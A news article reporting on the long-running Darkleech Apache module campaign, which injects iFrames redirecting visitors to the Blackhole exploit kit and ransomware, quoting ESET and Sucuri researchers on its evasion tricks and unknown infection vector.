One of the most successful malware infection campaigns ever is still going strong, and researchers have not come closer to discovering how the attackers are compromising web servers and the websites hosted on them.
The campaign uses the Darkleech Apache module to inject and rotate malicious iFrames on the websites’ pages, and the iFrames redirect some of the visitors to sites hosting the Blackhole exploit kit.
If the exploit kit succeeds in taking advantage of a vulnerability on the victims’ computer, they are saddled with Pony Loader and Sirefef Trojans, and the Nymaim ransomware, which locks their computer and demands $300 to unlock it.
“This campaign has been going on for a very long time. Our data shows that the Blackhole instance has been active for more than 2 years, since at least February 2011,” shared ESET researcher Sebastien Duquette.
The problem that security researchers have with tracking down and analyzing sites compromised in this campaign is that not all visitors trigger the iFrame injection. In particular, the module recognizes IP addresses belonging to security companies and hosting firms, traffic coming from specified search queries, and IP addresses that have recently been attacked, and refrains from effecting the injection.
According to ESET researchers, the campaign uses compromised CPanel and Plesk servers for the URL rotation, and more than 40,000 domains and IPs were used at some point in the rotation – 15,000 of which were active at the same time in May 2013.
“How did the cybercriminals manage to exert control over so many IPs and domains? By compromising the CPanel and Plesk panels used by many web hosting companies to manage their networks and sometimes control hundreds or thousands of websites,” Duquette explains.
But, once again, the researchers can’t figure out how access to the servers is initially obtained. “It might simply be through stolen passwords as the Pony Loader trojan contains code to steal credentials for protocols such as FTP and HTTP,” he concluded.
It’s interesting to note that another Apache module (Cdorked) that also targets nginx and Lighttpd web servers has been detected back in March 2103, and has also puzzled ESET researchers.
“We still don’t know for sure how this malicious software was deployed on the web servers,” the researchers admitted at the time. “We believe the infection vector is not unique. It cannot be attributed solely to installations of cPanel because only a fraction of the infected servers are using this management software. One thing is clear, this malware does not propagate by itself and it does not exploit a vulnerability in a specific software.”
Lastly, Sucuri Security researchers unearthed a new malicious Apache module used in a similar campaign. “We don’t know if it is a new and improved version of Darkleech or a completely different tool written by a different group. Our team is still working on the binary and trying to scope the reach of this infection,” they said, and continue investigating.